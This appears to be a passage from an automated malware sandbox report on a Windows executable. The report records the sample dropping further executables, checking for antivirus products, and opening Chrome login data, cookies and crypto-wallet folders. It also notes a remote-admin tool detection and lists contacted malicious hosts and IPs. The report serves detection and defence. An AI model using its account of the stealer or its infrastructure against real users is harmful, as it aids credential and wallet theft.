Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Users\user\Desktop\1wOdXavtlE.exe VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ssevs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sssevs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ssevs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\sssevs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Immunity\rutserv.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp Code function: 19_2_0060C5F8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeW,GetLastError,CreateFileW,SetNamedPipeHandleState,CreateProcessW,CloseHandle,CloseHandle, 19_2_0060C5F8
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_0041C4F8 GetLocalTime, 17_2_0041C4F8
Source: C:\Users\user\AppData\Local\Temp\servs.exe Code function: 17_2_004A7114 GetModuleHandleW,GetVersion,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDEPPolicy, 17_2_004A7114
Source: C:\Users\user\Desktop\1wOdXavtlE.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\1wOdXavtlE.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\1wOdXavtlE.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\1wOdXavtlE.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\1wOdXavtlE.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

Found many strings related to Crypto-Wallets (likely being stolen)
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp String found in binary or memory: \Electrum\wallets
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp String found in binary or memory: l4C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp String found in binary or memory: \com.liberty.jaxx
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp String found in binary or memory: \Exodus\exodus.wallet
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp String found in binary or memory: \Ethereum\wallets
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp String found in binary or memory: \Exodus\exodus.wallet
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp String found in binary or memory: \Ethereum\wallets
Source: 1wOdXavtlE.exe, 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp String found in binary or memory: l8C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: 1wOdXavtlE.exe String found in binary or memory: set_UseMachineKeyStore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\1wOdXavtlE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\1wOdXavtlE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\1wOdXavtlE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\1wOdXavtlE.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\Desktop\1wOdXavtlE.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Yara detected Credential Stealer
Source: Yara match File source: 00000002.00000002.488788111.0000000002F9C000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected RMS RemoteAdmin tool
Source: Yara match File source: 00000025.00000002.570035288.00000000015DA000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.537867326.00000000015DA000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\Immunity\is-4BBH3.tmp, type: DROPPED
Behavior Graph ID: 383846  Sample: 1wOdXavtlE.exe  Startdate: 08/04/2021  Architecture: WINDOWS  Score: 100
(The graph is rendered as an image; the process tree, dropped files and contacted hosts it shows are reproduced below. The start node also lists zen.hldns.ru.)

1wOdXavtlE.exe  [drops C:\Users\user\AppData\...\1wOdXavtlE.exe.log]
  1wOdXavtlE.exe  [contacts pokacienon.xyz 79.141.170.43, api.ip.sb and 4 other IPs or domains; drops sssevs.exe, ssevs.exe, servs.exe]
    servs.exe  [drops servs.tmp]
      servs.tmp  [drops C:\ProgramData\is-R3F67.tmp, C:\ProgramData\is-PFD3D.tmp, _setup64.tmp]
        cmd.exe  [drops PasswordOnWakeSettingFlyout.exe and C:\Windows \System32\uxtheme.dll; drops executables to the Windows directory and starts them; uses regedit.exe to modify the registry]
          PasswordOnWakeSettingFlyout.exe
            pass.exe
              pass.tmp  [drops C:\ProgramData\Immunity\is-4BBH3.tmp, C:\ProgramData\Immunity\is-2SOD7.tmp, _setup64.tmp and 3 other files]
                cmd.exe
                cmd.exe
                  conhost.exe  [DLL side loading technique detected]
          conhost.exe  [DLL side loading technique detected]
          timeout.exe
    ssevs.exe
      ssevs.exe  [contacts 86.107.197.8:38214, api.ip.sb]
    sssevs.exe  [injects a PE file into a foreign process]
      sssevs.exe  [contacts 195.54.160.9:32972, api.ip.sb]
    2 other processes  [contact 192.168.2.1, iplogger.org]
      iexplore.exe  [contacts iplogger.org 88.99.66.31:443]
      iexplore.exe
svchost.exe  [contacts 127.0.0.1]
svchost.exe
3 other processes

Contacted Public IPs

IP              Domain                Country        ASN    ASN Name      Malicious
52.216.141.204  s3-1-w.amazonaws.com  United States  16509  AMAZON-02US   false
195.54.160.9    unknown               unknown        49505  SELECTELRU    false
104.192.141.1   bitbucket.org         United States  16509  AMAZON-02US   false
86.107.197.8    unknown               Romania        39855  MOD-EUNL      true
88.99.66.31     iplogger.org          Germany        24940  HETZNER-ASDE  false
79.141.170.43   pokacienon.xyz        Bulgaria       61046  HZ-UK-ASGB    true
52.216.179.59   unknown               United States  16509  AMAZON-02US   false

Private IPs

192.168.2.1
127.0.0.1

Contacted Domains

Name IP Active
bitbucket.org 104.192.141.1 true
s3-1-w.amazonaws.com 52.216.141.204 true
pokacienon.xyz 79.141.170.43 true
zen.hldns.ru 194.169.163.42 true
iplogger.org 88.99.66.31 true
bbuseruploads.s3.amazonaws.com unknown unknown
api.ip.sb unknown unknown

Contacted URLs

Name                        Malicious  Antivirus Detection    Reputation
http://86.107.197.8:38214/  true       Avira URL Cloud: safe  unknown
http://pokacienon.xyz/      false      Avira URL Cloud: safe  unknown